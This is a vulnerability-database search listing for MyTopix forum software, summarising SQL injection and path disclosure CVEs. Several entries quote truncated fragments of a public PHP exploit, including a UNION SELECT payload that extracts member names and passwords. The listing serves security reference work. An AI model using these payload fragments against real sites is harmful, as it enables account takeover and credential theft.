26 matches found
EUVD-2006-0596
Malware in sbrugna...
EUVD-2008-6300
Malware in sbrugna...
EUVD-2006-0595
Malware in sbrugna...
MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit
No description provided by source. ?php / MyTopix = 1.3.0 notes send Remote SQL Injection Exploit Bug discovered & exploited by cOndemned Desc : In order to exploit this vulnerability user have to be logged on the forum, so I'd decided to write this exploit x Greetz : Ex. fobidd3n t3am - Sw33t,...
CVE-2008-6330
SQL injection vulnerability in index.php in MyTopix 1.3.0 and earlier allows remote authenticated users to execute arbitrary SQL commands via the send parameter in a notes action...
Sql injection
SQL injection vulnerability in index.php in MyTopix 1.3.0 and earlier allows remote authenticated users to execute arbitrary SQL commands via the send parameter in a notes action...
CVE-2008-6330
CVE-2008-6330 affects MyTopix 1.3.0 and earlier, where an SQL injection is possible in index.php via the send parameter in a notes action. The vulnerability allows remote authenticated users to execute arbitrary SQL commands. According to NVD metrics, the exploit is network-based with low attack ...
CVE-2008-6330
SQL injection vulnerability in index.php in MyTopix 1.3.0 and earlier allows remote authenticated users to execute arbitrary SQL commands via the send parameter in a notes action...
MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit
No description provided by source. ?php / MyTopix = 1.3.0 notes send Remote SQL Injection Exploit Bug discovered & exploited by cOndemned Desc : In order to exploit this vulnerability user have to be logged on the forum, so I'd decided to write this exploit x Greetz : Ex. fobidd3n t3am - Sw33t,...
MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ========================================================== MyTopix evil = ''; $this - socket = socketcreateAFINET, SOCKSTREAM, SOLTCP; $this - inj = '-1+UNION+SELECT+concatmembersname,0x3a,memberspass+FROM+mymembers+WHERE+membersid=2--';...
MyTopix 1.3.0 - SQL Injection
MyTopix 1.3.0 - SQL Injection evil = ''; $this - socket = socketcreateAFINET, SOCKSTREAM, SOLTCP; $this - inj = '-1+UNION+SELECT+concatmembersname,0x3a,memberspass+FROM+mymembers+WHERE+membersid=2--'; private function send$packet if!$this - socket $this - socket = socketcreateAFINET, SOCKSTREAM,...
mytopix-sql.txt
evil = ''; $this - socket = socketcreateAFINET, SOCKSTREAM, SOLTCP; $this - inj = '-1+UNION+SELECT+concatmembersname,0x3a,memberspass+FROM+mymembers+WHERE+membersid=2--'; private function send$packet if!$this - socket $this - socket = socketcreateAFINET, SOCKSTREAM, SOLTCP; socketconnect$this -...
MyTopix 1.3.0 - SQL Injection
evil = ''; $this - socket = socketcreateAFINET, SOCKSTREAM, SOLTCP; $this - inj = '-1+UNION+SELECT+concatmembersname,0x3a,memberspass+FROM+mymembers+WHERE+membersid=2--'; private function send$packet if!$this - socket $this - socket = socketcreateAFINET, SOCKSTREAM, SOLTCP; socketconnect$this -...
CVE-2006-0588
SQL injection vulnerability in search.php in MyTopix 1.2.3 allows remote attackers to execute arbitrary SQL commands via the 1 mid and 2 keywords parameters...
CVE-2006-0590
MyTopix 1.2.3 allows remote attackers to obtain the installation path via an invalid hl parameter to index.php, which leads to path disclosure, possibly related to invalid SQL syntax...
CVE-2006-0589
MyTopix 1.2.3 allows remote attackers to obtain the installation path via a direct request to logon.mod.php, which leaks the path in an error message...
Path traversal
MyTopix 1.2.3 allows remote attackers to obtain the installation path via an invalid hl parameter to index.php, which leads to path disclosure, possibly related to invalid SQL syntax...
Sql injection
SQL injection vulnerability in search.php in MyTopix 1.2.3 allows remote attackers to execute arbitrary SQL commands via the 1 mid and 2 keywords parameters...
CVE-2006-0588
Affected software: MyTopix 1.2.3. The vulnerability is in search.php and is caused by an SQL injection via the mid and keywords parameters, enabling remote attackers to execute arbitrary SQL commands. Consequences include potential partial confidentiality, integrity, and availability impact as in...
CVE-2006-0589
CVE-2006-0589 affects MyTopix 1.2.3. The vulnerability allows remote attackers to obtain the installation path by making a direct request to logon.mod.php, which leaks the path in an error message. No explicit exploit code or in-the-wild details are provided in the documents beyond this. The conn...